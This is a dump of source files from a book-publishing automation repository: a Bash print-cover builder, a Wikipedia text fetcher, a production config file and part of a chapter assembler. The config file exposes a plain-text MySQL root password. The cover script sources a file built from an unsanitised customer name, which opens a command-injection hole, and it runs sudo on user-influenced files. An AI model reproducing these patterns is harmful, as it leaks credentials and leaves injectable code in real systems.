2\n\t\t;;\n\t--trimsize)\n\t\ttrimsize=${1#*=}\n\t\tshift\n\t\t;;\n --customer_email)\n customer_email=$2\n shift 2\n ;;\n --customer_email)\n customer_email=${1#*=}\n shift\n ;;\n\t--pass_uuid)\n\t\tpass_uuid=$2\n\t\tshift 2\n\t\t;;\n\t--pass_uuid)\n\t\tpass_uuid=${1#*&=}\n\t\tshift\n\t\t;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n esac\ndone\n\nsku=\"sku\"\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$userprovidedprintISBN\" ]; then\n echo \"ERROR: option '--ISBN [isbnvalue]' not given. See --help\" >&2\n exit 1\nfi\n\n\n\necho \"imprint name\" $imprintname\n\nif [ \"$covercolor\" = \"Random\" ] ; then\n\n covercolor=`shuf -n 1 ../conf/print-cover-colors.txt`\n coverfontcolor=\"White\"\n echo \"Random cover color is \" $covercolor\n\nelse\n\n echo \"covercolor is unchanged as\" $covercolor\n\nfi\n\nif [ \"$coverfont\" = \"Random\" ] ; then\n\n coverfont=`shuf -n 1 ../conf/print-cover-fonts.txt`\n echo \"Random cover font is \" $coverfont\nelse\n echo \"coverfont is unchanged as\" $coverfont\n\nfi\n\nspinefloat=$(echo \"300*$spineinches\" |bc); echo \"spine width in floating point pixels is\" $spinefloat; spinepixels=${spinefloat/.*}; echo \"spine width in integer pixels is \" $spinepixels\n\n\necho \"accepted userprovidedprintISBN from command line and it is \" $userprovidedprintISBN\necho \"accepted covertitle from command line and it is \" $covertitle\necho \"accepted shorttitle from command line and it is \" $shorttitle\necho \"accepted editedby from command line and it is \" $editedby\necho \"accepted spine pixels or spineinches from command line and result is \" $spinepixels\necho \"accepted path to pdf of interior and it is \" $pdfpath\necho \"accepted covertype and it is\" $covertype\necho \"accepted user image path and it is\" $userimage\necho \"accepted user caption and it is\" $usercaption\necho \"accepted trim size and it is\" $trimsize\necho \"accepted customer email and it is\" $customer_email\necho \"accepted uuid from command line and it is\" $pass_uuid\nuuid=$pass_uuid\necho \"accordingly uuid for this instance is now\" $uuid\n\n\n# echo making directories as needed\n\nif [ ! $(ls -A images/$uuid) ] ; then\n\tmkdir -p images/$uuid ; mkdir -p images/$uuid/print\nelse\n\techo \"uuid directories were already made by xform\"\nfi\n\n# need to protect SQL from apostrophes in \n\n#$LOCAL_MYSQL_PATH --user $LOCAL_MYSQL_USER --password=$LOCAL_MYSQL_PASSWORD sfb-jobs << EOF\n#insert into standalone_print_cover_builds (ISBN, covertitle, shorttitle, editedby, spinepixels, covercolor, coverfontcolor, coverfont, uuid) values('$userprovidedprintISBN', '$covertitle', '$shorttitle', '$editedby', '$spinepixels', '$covercolor', '$coverfontcolor', '$coverfont', '$uuid');\n#EOF\n\n\n# calculate dimensions\n\ncase $trimsize in\n\n5.5x8.5)\n\n print_horizontal_trim=1538 # 2438 8.125 inches for 8.5 inch books \n\tprint_vertical_trim=2550 # 3300 for 11 inch\n ;;\n\n8.5x11)\n print_horizontal_trim=2438 # 8.125 inches for 8.5 inch books \n\tprint_vertical_trim=3300 # for 11 inch\n bottom_label_top_edge=$((print_vertical_trim - print_bottom_height - 175))\n ;;\n*)\n echo \"invalid trimsize\" \n exit 0\n;;\nesac\n\n\t# calculate spine dimensions (we must know the spine before we can do the canvas!)\n\n\t\techo \"checking sku is \" $sku \"and path to pdf is \" $pdfpath\n\n\t\tpdfpagecount=`pdftk \"$pdfpath\" dump_data output | grep -i NumberOfPages | cut -d\":\" -f2 | sed '/^$/d'`\n\n\t\techo \"pdf page count is\" $pdfpagecount\n\n\t\t# get rid of space and save $spinepixels as variable\n\n\t\t# BUT THIS ASSUMES THAT OCR LAYER IS EMBEDDED IN PDR\n\n\t# calculate size of canvas\n\n\t\tcanvaswidth=$(( $print_horizontal_trim * 2 + $spinepixels + $outsidebleed + $insidebleed + $insidebleed + $outsidebleed + 49 ))\n\t\tcanvasheight=$(( $topbleed + $print_vertical_trim + $bottombleed + 10 ))\n\n\t\techo \"calculated canvaswidth as \"$canvaswidth\n\t\techo \"calculated canvasheight as \"$canvasheight\n\n\t# calculate safe areas on front and back page\n\n\t\tsafepagewidth=$(( $print_horizontal_trim - $textsafety - $textsafety ))\n\t\tsafepageheight=$(( $print_vertical_trim - $textsafety ))\n\n\t\techo \"calculated safepagewidth as\" $safepagewidth\n\t\techo \"calculated safepageheight as\" $safepageheight\n\n\t# calculate word cloud size\n\n\t\twordcloudwidth=$(( $print_horizontal_trim - 150))\n\t\twordcloudheight=$(( $safepageheight- $print_bottom_height - $print_top_height ))\n\t\techo \"calculated wordcloudwidth\" as $wordcloudwidth \"and wordcloudheight\" as $wordcloudheight\n\n\t# calculate spine\n\n\t\tif [ \"$spinepixels\" -lt 106 ] ; then\n\t\t\tspinesafety=19\n\t\t\techo \"because spine width is less than 106 pixels, spinesafety is \" $spinesafety \"and we are using the short title for the spine\"\n\t\t\t\n\t\telse\n\t\t\tspinesafety=37\n\t\t\techo \"because spine width is greater than 105 pixels, spinesafety is \" $spinesafety\n\t\tfi\n\n\t\n\n\t\tsafespinetitlewidth=$(( $spinepixels - $spinesafety - $spinesafety ))\n\n\t\techo \"safespinetitlewidth is\" $safespinetitlewidth\n\n\t\tsafespinetitleheight=$(( $safepageheight * 2 ))\n\n\t\techo \"calculated safespinetitleheight as \" $safespinetitleheight\n\n\t\tspineleftmargin=$(( $outsidebleed + $insidebleed + $print_horizontal_trim -18 + $spinesafety * 2))\n\n\t\techo \"calculated spineleftmargin as bleed + page width + spinepixels for \" $spineleftmargin\n\t\t\n\t\n\n\t# front page calculations\n\n\t\tfrontpageflushleftmargin=$(( $outsidebleed + $print_horizontal_trim + $insidebleed + $spinepixels + insidebleed - 8 ))\n\n\t\techo \"calculated frontpageflushleftmargin as\" $frontpageflushleftmargin\n\n\t\t# there's always a cushion around top and bottom text \n\n\t\tfrontpagetopcushion=150\n\n\t\tfrontpagebottomcushion=0\n\n\t\techo \"frontpagetopcushion is \" $frontpagetopcushion\n\t\techo \"frontpagebottomcushion is \" $frontpagebottomcushion\n\n\t# back page calculations\n\n\t\tISBNylocation=$(( $safepageheight - 300 - 25 ))\n\t\tISBNxlocation=$(( $outsidebleed + 125 ))\n\n\t\techo \"calculated ISBNxlocation as\" $ISBNxlocation\n\t\techo \"calculated ISBNylocation as\" $ISBNylocation\n\n\t\tbackpagetopcushion=$frontpagetopcushion\n\t\tbackpagebottomcushion=$frontpagebottomcushion\n\n\t\techo \"backpage top and bottom cushions are\" $backpagetopcushion \"and\" $backpagebottomcushion\n\n\t\tbackpageleftbleedbegins=$(($outsidebleed))\n\t\tbackpagelefttextbegins=$(($backpageleftbleedbegins + $textsafety))\n\t\n\t\techo \"backpage left bleed and left text margin are\" $backpageleftbleedbegins \"and\" $backpagelefttextbegins\n\n\n\t# start by building the full canvas\n\n\t\tconvert -size \"$canvaswidth\"x\"$canvasheight\" xc:$covercolor \\\n\t\t-units \"PixelsPerInch\" -density 300 -resample 300x \\\n\t\timages/$uuid/print/fullcanvas.png\n\n\n\t# then create the front cover\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_vertical_trim\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/canvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/topcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/bottomcanvas.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_top_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/toplabel.png\n\t\tconvert -size \"$print_horizontal_trim\"x\"$print_bottom_height\" -density 300 -units pixelsperinch xc:$covercolor images/$uuid/print/bottomlabel.png\n\n\n\tcase $covertype in\n\n\n\twordcloud)\n\n\t\tpdftotext \"$pdfpath\" images/$uuid/print/wordcloud.txt\n\n\t\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w $wordcloudwidth -h $wordcloudheight < images/$uuid/print/wordcloud.txt > images/$uuid/print/\"printcloud.png\" 2> /dev/null\n\n\t\t# building WordCloud \"PK Peek\" \n\n\t\tpeekthroughwidth=$(( wordcloudwidth / 3 + 25))\n\n\t\tconvert -size \"$peekthroughwidth\"x100 -density 300 -border 1 -bordercolor \"white\" -units pixelsperinch -background $covercolor -fill \"$coverfontcolor\" \\\n\t\t-font \"$coverfont\" -gravity center -pointsize 11 caption:\"Peekthrough by PageKicker\" images/$uuid/print/peekthrough.png \n\t\tconvert images/$uuid/print/peekthrough.png images/$uuid/print/\"printcloud.png\" -append images/$uuid/print/\"peekprintcloud.png\"\n\n\t\t# overlay the Word Cloud cover \n\n\t\tcomposite -gravity Center images/$uuid/print/\"peekprintcloud.png\" images/$uuid/print/canvas.png images/$uuid/print/canvastest.png\n\n\t;;\n\n\timagefrontcenter) \n\t\t\n\t\tconvert \"$userimage\" -resize \"$wordcloudwidth\"x\"$wordcloudheight\" images/$uuid/print/resizedimage.tif\n\t\tconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -size \"$wordcloudwidth\"x200 -pointsize \"14\" caption:\"$usercaption\" -gravity \"north\" images/$uuid/print/usercaption.png\n\t\tconvert images/$uuid/print/resizedimage.tif images/$uuid/print/usercaption.png -append images/$uuid/print/resizedimagewithcaption.tif\n\t\tcomposite -gravity Center images/$uuid/print/resizedimagewithcaption.tif images/$uuid/print/canvas.png images/$uuid/print/canvastest.png\n\n\t;;\n\n\t*)\n\n\tesac\n\n\t# build the labels for the front cover\n\n\techo \"covertitle is\" $covertitle\n\n\tconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity center -size \"$print_label_text_width\"x\"$print_top_height\" \\\n\t\t\t-font \"$coverfont\" caption:\"$covertitle\" \\\n\t\t\t-density 300 -units pixelsperinch\\\n\t\t\t\t images/$uuid/print/topcanvas.png +swap -gravity center -composite images/$uuid/print/toplabel.png\n\n\techo \"print_label_text_width is\" $print_label_text_width \"and height is\" $print_top_height\n\n\tconvert -background $covercolor -fill \"$coverfontcolor\" -gravity center -border 20x20 -bordercolor \"$covercolor\" -size \"$print_label_text_width\"x\"$print_bottom_height\" \\\n\t\t -font \"$coverfont\" caption:\"$editedby\" \\\n\t\t-density 300 -units pixelsperinch\\\n\t\t images/$uuid/print/bottomcanvas.png +swap -gravity center -composite images/$uuid/print/bottomlabel.png\n\n\t# lay the labels on top of the front cover\n\t\tcomposite -geometry +0+150 images/$uuid/print/toplabel.png images/$uuid/print/canvastest.png images/$uuid/print/step1.png\n\t\tbottom_label_top_edge=$((bottom_label_top_edge - 150))\n\t\tcomposite -geometry +0+$bottom_label_top_edge images/$uuid/print/bottomlabel.png images/$uuid/print/step1.png images/$uuid/print/step2.png\n\n\t\tcase \"$imprintname\" in\n\t\tPageKicker)\n\t\tcomposite -gravity south -geometry +0+0 assets/PageKicker_cmyk300dpi_300.png images/$uuid/print/step2.png images/$uuid/print/cover.png\n\t\t;;\n\t\t*)\n\t\tconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -size \"$wordcloudwidth\"x\"300\" -font \"$coverfont\" caption:\"$imprintname\" images/$uuid/print/imprintname.png\n\t\tcomposite -gravity south -geometry +0+0 images/$uuid/print/imprintname.png images/$uuid/print/step2.png images/$uuid/print/cover.png\n\t\t;;\n\t\tesac\n\n\t# make a working copy of the front cover\n\n\t\tcp images/$uuid/print/cover.png images/$uuid/print/$sku\"printfrontcover.png\"\n\n\t# make PDF and EPS copies of the front cover\n\t\tconvert images/$uuid/print/$sku\"printfrontcover.png\" -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\"\n\t\tconvert -density 300 images/$uuid/print/$sku\"printfrontcover.pdf\" images/$uuid/print/$sku\"printfrontcover.eps\"\n\n\t# build the ISBN\n\t\n\tpython $scriptpath\"lib/bookland-1.4/bookland-1.4.1b\" -o images/$uuid/print/$userprovidedprintISBN.eps -f OCRB -b 1 -n -q --cmyk 0,0,0,1.0 \"$userprovidedprintISBN\" 90000\n\n # need to get rid of following sudo - it is ghostscript/imagemagick problem\n\n\tsudo convert -units \"PixelsPerInch\" -density 1200 -resize 25% -colorspace CMYK images/$uuid/print/$userprovidedprintISBN.eps -colorspace CMYK images/$uuid/print/$userprovidedprintISBN.png\n\tconvert images/$uuid/print/$userprovidedprintISBN.png -colorspace CMYK -background white -flatten images/$uuid/print/$userprovidedprintISBN\"box.png\"\n\n\t# build the spine caption\n\n\techo \"building spine caption\"\n\n\tconvert -size \"$safespinetitleheight\"x\"$safespinetitlewidth\" -density 300 -units pixelsperinch -background $covercolor -pointsize \"11\" -fill \"$coverfontcolor\" -font \"$coverfont\" \\\n\t-rotate 90 -gravity west caption:\"$shorttitle\" images/$uuid/print/spinecaption.png\n\n\t# build the spine logotype\n\n\tlogotypeheight=$(( safespinetitleheight / 6))\n\techo \"calculated logotypeheight as\" $logotypeheight\n\n\tconvert -size \"$logotypeheight\"x\"$safespinetitlewidth\" -density 300 -units pixelsperinch -background \"$covercolor\" -fill \"$coverfontcolor\" \\\n\t-font \"$coverfont\" -rotate 90 -gravity East -pointsize \"11\" caption:\"$imprintname\" images/$uuid/print/spinelogotype.png\n\n\n# lay the objects on the canvas\n \n\n\t# lay the front cover on the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas.png \\\n\t\timages/$uuid/print/$sku\"printfrontcover.png\" -geometry +$frontpageflushleftmargin+$topbleed -composite \\\n\t\timages/$uuid/print/fullcanvas2.png\n\n# assemble and lay down the spine caption and logotype, unless it is too thin\n\n\tif [ \"$pdfpagecount\" -lt 48 ]; then\n\n\t\techo \"page count too low for spine\"\n\t\tcp images/$uuid/print/fullcanvas2.png images/$uuid/print/finalcanvas.png\n cp images/$uuid/print/fullcanvas2.png images/$uuid/print/fullcanvas4.png\n\n\telse\n\n\t\t# lay the spine caption on the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas2.png \\\n\t\timages/$uuid/print/spinecaption.png -geometry +$spineleftmargin+375 -composite \\\n\t\timages/$uuid/print/fullcanvas3.png\n\n\n\t\t# resize the purple bird \n\t\tpurplebirdsize=75\n\t\tconvert \"$imprintlogo\" -resize $purplebirdsizex$purplebirdsize\\> images/$uuid/print/purple$safespinetitlewidth.png\n\n\t\t# surround the bird with a white box\n\n\t\tconvert -units \"PixelsPerInch\" -density 300 -resample 300x -border 5x5 -bordercolor white images/$uuid/print/purple$safespinetitlewidth.png -colorspace CMYK images/$uuid/print/purplebirdwithbox.png\n\n\t\t# create spacer box\n\n\t\tconvert -size \"$safespinetitlewidth\"x20 xc:none images/$uuid/print/spacer.png\n\n\t\t# append spine logotype, spacer, and purplebird box\n\n\t\tconvert images/$uuid/print/spinelogotype.png images/$uuid/print/spacer.png -background none -gravity west -append images/$uuid/print/logowithspacer.png\n\n\t\t\tif [[ \"$spinepixels\" -gt 144 ]] ; then \n\n\t\t\tconvert images/$uuid/print/logowithspacer.png images/$uuid/print/purplebirdwithbox.png -background none -gravity center -append images/$uuid/print/logobar.png\n\n\t\t\telse \n\n\t\t\tcp images/$uuid/print/logowithspacer.png images/$uuid/print/logobar.png\n\n\t\t\tfi\n\n\t\t# lay the spine logotype on the full canvas\n\n\t\tstep1=$(( $safepageheight))\n\t\techo \"step1 is \" $step1\n\t\tstep2=$(( $step1 - 900 ))\n\t\techo \"step2 is \"$step2\n\t\tspinelogotypebegin=$(( $step2 ))\n\t\techo \"calculated spinelogotype begin as \" $spinelogotypebegin\n\n\t\tspinelogotypeleftmargin=$(( $spineleftmargin + 2 ))\n\n\t\techo \"about to lay down the missing logobar at \" $spineleftmargin \",\" $spinelogotypebegin\n\n\t\tconvert images/$uuid/print/fullcanvas3.png \\\n\t\timages/$uuid/print/logobar.png -geometry +$spineleftmargin+$spinelogotypebegin -composite \\\n\t\timages/$uuid/print/fullcanvas4.png\n\n\t\techo \"finished laying the spine on the canvas\"\n\n fi\n\n\t\techo \"determining what to lay on back cover\"\n\n\techo \"covertype is \"$covertype\n\t\tcase \"$covertype\" in\n\t\timagefrontcenter)\n\n\t\t\t\n\n\t\t\tpdf2txt \"$pdfpath\" > images/$uuid/print/wordcloud.txt\n\n\t\t\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w $wordcloudwidth -h $wordcloudheight < images/$uuid/print/wordcloud.txt > images/$uuid/print/\"printcloud.png\" 2> /dev/null\n\n\t\t\t# building WordCloud \"PK Peek\" \n\n\t\t\tpeekthroughwidth=$(( wordcloudwidth / 3 + 25))\n\n\t\t\tconvert -size \"$peekthroughwidth\"x100 -density 300 -border 1 -bordercolor \"white\" -units pixelsperinch -background $covercolor -fill \"$coverfontcolor\" \\\n\t\t\t-font \"$coverfont\" -gravity center -pointsize 11 caption:\"Peekthrough by PageKicker\" images/$uuid/print/peekthrough.png \n\t\t\tconvert images/$uuid/print/\"printcloud.png\" images/$uuid/print/peekthrough.png -composite images/$uuid/print/\"peekprintcloud.png\"\n\t\t\n\t\t\t# overlay the Word Cloud on the back cover\n\n\t\t\twordcloudylocation=$(($ISBNylocation - $wordcloudheight))\n\t\t\techo \"calculated wordcloudylocation as\" $wordcloudylocation\n\n\t\t\tcomposite -geometry +$ISBNxlocation+$wordcloudylocation images/$uuid/print/\"peekprintcloud.png\" images/$uuid/print/fullcanvas4.png images/$uuid/print/fullcanvas4.png\n\n\t\t\techo \"built word cloud and put it on back cover\"\n\t\t\t;;\n\t\twordcloud)\n\t\t\n\t\t\t#since wordcloud is on front caption is on back\n\n\t\t\tbackcoverlocation=$(($ISBNylocation -300 ))\n\t\t\techo \"calculated backcoverylocaion as\" $backcoverylocation\n\t\t\tconvert -size 1200x1200 -density 300 -border 1 -bordercolor \"$covercolor\" -units pixelsperinch -background $covercolor -fill $coverfontcolor -font $coverfont -gravity center -pointsize 11 caption:@images/$uuid/print/backcover.txt images/$uuid/print/backcovertext.png\n\n\t\t\tcomposite -geometry +$ISBNxlocation+$backcoverylocation images/$uuid/print/\"backcovertext.png\" images/$uuid/print/fullcanvas4.png images/$uuid/print/fullcanvas5.png\n\n\t\t\techo \"built caption text and put it on back cover\"\n\t\t\t;;\n\n\t\t*)\n\t\t\techo \"did not recognize cover type\"\n\t\t\t;;\n\t\tesac\n\n\t\n\t\t# lay the ISBN box at the bottom left corner of the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas4.png images/$uuid/print/fullcanvas4.tif\n\n\t\tsudo convert images/$uuid/print/fullcanvas4.tif images/$uuid/print/$userprovidedprintISBN\"box.png\" -geometry +$ISBNxlocation+$ISBNylocation -composite -colorspace \"CMYK\" images/$uuid/print/fullcanvas5.tif\n\n\t\t\n\t\t\n\t\techo \"laid the ISBN box down\"\n\n\t\tcp images/$uuid/print/fullcanvas5.tif images/$uuid/print/finalcanvas.tif\n\n\n\t# lay the back text on the canvas\n\t\n # save the cover and prepare it for production\n\n\t# save as single large file (png)\n\n\t# convert RGB to CMYK\n\n\tsudo convert images/$uuid/print/finalcanvas.tif -colorspace CMYK images/$uuid/print/\"$userprovidedprintISBN\".pdf\n\tsudo convert images/$uuid/print/finalcanvas.tif -colorspace CMYK images/$uuid/print/\"$userprovidedprintISBN\"final.eps\n\n\n# save the cover and prepare it for production\n\n\t# save as single large file (png)\n\n\t# convert RGB to CMYK\n\n\n\techo \"built print cover as file images/$uuid/print/$sku.cmyk.pdf\" | tee --append $sfb_log\n\n# building interior now that front cover has been built (some extra logic here ... need to tighten)\n\n#xvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\".pdf\" --cover \"images/\"$uuid\"/print/\"$sku\"printfrontcover.png\" --margin-left \"54\" --margin-right \"54\" --margin-top \"54\" --margin-bottom \"54\" --pdf-default-font-size \"11\" --pdf-page-numbers --insert-metadata --pdf-serif-family \"AvantGarde\" --title \"$covertitle\"\n\nif [ \"$pdfx1a\" = \"None\" ] ; then \n\necho \"not saving interior as PDFx1a\"\n\nelif [ \"$pdfx1a\" = \"PDFX1a color\" ] ; then\n\necho \"saving interior as PDFX1a color\"\n\n./lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o images/$uuid/print/interior.pdf $pdfpath\n\nelif [ \"$pdfx1a\" = \"PDFX1a black and white\" ] ; then \n\necho \"saving interior as PDFx1a black and white\"\n\n./lib/pstill_dist/pstill -B -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o images/$uuid/print/interior.pdf $pdfpath\n\nelse\n\necho \"I'm confused about requested PDFx1a action\"\n\nfi\n\n# now mailing results\n\nif [ \"$pdfx1a\" = \"None\" ] ; then \n\necho \"sending cover only\"\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Cover Builder Results\" \\\n\t-m \"Cover attached\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n -a images/$uuid/print/$userprovidedprintISBN.pdf \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \n\nelif [ \"$pdfx1a\" = \"PDFX1a color\" ] ; then\n\necho \"sending cover and interior\"\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Cover Builder Results\" \\\n\t-m \"Cover attached\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n -a images/$uuid/print/$userprovidedprintISBN.pdf \\\n\t-a images/$uuid/print/interior.pdf \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \n\nelif [ \"$pdfx1a\" = \"PDFX1a black and white\" ] ; then \n\necho \"saving interior as PDFx1a black and white\"\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Cover Builder Results\" \\\n\t-m \"Cover attached\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n -a images/$uuid/print/$userprovidedprintISBN.pdf \\\n -a images/$uuid/print/interior.pdf \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \nelse\n\n\techo \"didn't mail anything\"\nfi\n\necho -n \"t update \" > images/$uuid/tcommand\necho -n \\\" >> images/$uuid/tcommand\necho -n Automagically built a one-click cover for $customername >> images/$uuid/tcommand\necho -n \\\" >> images/$uuid/tcommand\n. images/$uuid/tcommand\n\nfb_announcement=\"yes\"\n\nif [ \"$fb_announcement\" = \"yes\" ] ; then\n\n fbcmd PPOST 472605809446163 \"Automagically built a one-click cover for $customername\"\n\nelse\n echo \"no fb notification\"\nfi\n\n\n" }, { "alpha_fraction": 0.6458598971366882, "alphanum_fraction": 0.6535031795501709, "avg_line_length": 26.068965911865234, "blob_id": "ef545bbfb2d2e7756b371a84c6bba85bc2153592", "content_id": "32d68c602321348faac5dcf0340f77fb775111d8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1570, "license_type": "permissive", "max_line_length": 113, "num_lines": 58, "path": "/scripts/bin/wikifetcher.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwikipedia text fetcher\nFred Zimmerman\nwfzimmerman#gmail.com\n\nenhanced to allow pointing at any MediaWiki endpoint URL\n\n\n\"\"\"\n\nimport argparse, wikipedia\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\n#parser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'http://en.wikipedia.org/w/api.php')\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nlang = args.lang\nsummary = args.summary\nmediawiki_api_url = args.mediawiki_api_url\n\ntest = 'mw url is ' + mediawiki_api_url\nprint(test)\n\n# request_type = args.request_type\nwikipedia.set_lang(lang)\n\nfile = open(input_file, 'r')\nfile2 = open(output_file, 'wb')\nfor line in file:\n #print(line),\n try:\n a = wikipedia.summary(line)\n a = wikipedia.page(line)\n if args.summary:\n a = a.summary\n else:\n a = a.content\n except:\n wikipedia.exceptions.DisambiguationError\n wikipedia.exceptions.WikipediaException\n continue\n\n file2.write(b'\\n')\n # print(a.encode('utf-8'))\n file2.write(b'\\n')\n file2.write(b'# ' )\n file2.write(line.encode('utf-8'))\n file2.write(b'\\n')\n file2.write(a.encode('utf-8'))\nfile2.close\n" }, { "alpha_fraction": 0.7633168697357178, "alphanum_fraction": 0.7682592272758484, "avg_line_length": 29.316667556762695, "blob_id": "03db15f86385a22180c681332c0706c684e817c6", "content_id": "236122b4449f0ab9c39bbcdeddd556fa0bda7c12", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1821, "license_type": "permissive", "max_line_length": 82, "num_lines": 60, "path": "/conf/sfb-production.conf.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n\nSFB_HOME=\"/opt/bitnami/apache2/htdocs/sfb-production/\"\nSFB_MAGENTO_HOME=\"/opt/bitnami/apps/magento/htdocs/\"\nLOCAL_DATA=$SFB_HOME\"local-data/\"\nSFB_PHP_BIN=\"/opt/bitnami/php/bin/php\"\nJAVA_BIN=\"/opt/bitnami/java/bin/java\"\nSFB_VERSION=\"-production.sh\"\nUSER_HOME=\"/home/bitnami/\"\nLOCAL_USER=\"bitnami\"\nWEBFORMSXML_HOME=\"/opt/bitnami/apps/magento/htdocs/sfb-production/magento-output/\"\nWEB_HOST=\"http://www.PageKicker.com/\"\nWEB_ROOT=$SFB_HOME\"pk-html/\"\nWEB_SCRIPTPATH=\"scripts/\"\nAPACHE_ROOT=\"$SFB_HOME\"\nLOCAL_MYSQL_PATH=\"/opt/bitnami/mysql/bin/mysql\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"Balssa41\"\n\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\"\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nscriptpath=$SFB_HOME\"scripts/\"\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/\"\nsfb_log=$logdir\"sfb_log.txt\"\nsfb_log_archive=$LOCAL_DATA\"archives/sfb_log_archive.txt\"\nxform_log=$logdir\"xform_log.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\ntiphys_log=$SFB_HOME\"local-data/logs/tiphys_log.txt\"\nsfb_log_archive=$LOCAL_DATA\"archives/sfb_log_archive.txt\"\nlsi_log=$LOCAL_data\"logs/lsi_log.txt\"\nwikilocale=\"en\"\nspecialstoreid=\"0\"\ngooglecollectioncode=\"HNXTBK0\" # for dedicated google book upload\ngoogle_nonONIX_import=\"no\"\n\n\n#imagemagick setup\n\ncover_image_extension=\".png\"\ntxtformatname=\".txt\"\ntxtwildcard=\"*.txt\"\nepub=\".epub\"xmlstarletwebformstart=\"xmlstarlet sel -t -v\"\nsubtitle=\"\"\nepubcheckjarpath=$scriptpath\"lib/epubcheck-3.0/epubcheck-3.0.jar\"\n# cover builder setup\n\nprintconfigfile=\"yes\"\n\n#xmlstarlet setup\n\nxmlstarletwebformstart=\"xmlstarlet sel -t -v\"\nxpathwebformid='\"/item/webform_id\"'\nbooktypewebformid='\"/item/booktype\"'\nsingleseedwebformid='\"/item/singleseed\"'\ncustomeridwebformid='\"/item/customerid\"'\n\n\n" }, { "alpha_fraction": 0.6634219288825989, "alphanum_fraction": 0.6720329523086548, "avg_line_length": 46.67856979370117, "blob_id": "bf91d506376b14bef109c377702c1d9bbb7771fb", "content_id": "8cc82c60b5b7dfa166c7ee7ca0a9ef2c2df15537", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2671, "license_type": "permissive", "max_line_length": 209, "num_lines": 56, "path": "/scripts/includes/fork-chapter-assembler.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# process each chapter\n#TEXTDOMAIN=chapter-assembler\nebook-convert tmp/$uuid/$count.html tmp/$uuid/$count.txt --pretty-print 1> /dev/null\necho $\"Chapter \"$count $safetitle >> tmp/$uuid/tmp.cumulative.txt\ncat tmp/$uuid/$count.txt >> tmp/$uuid/tmp.cumulative.txt\n\n echo \"now building word cloud page\" | tee --append $sfb_log\n\n $JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 1800 -h 2700 < tmp/$uuid/$count\".txt\" > tmp/$uuid/$count\".cloudbase.png\" 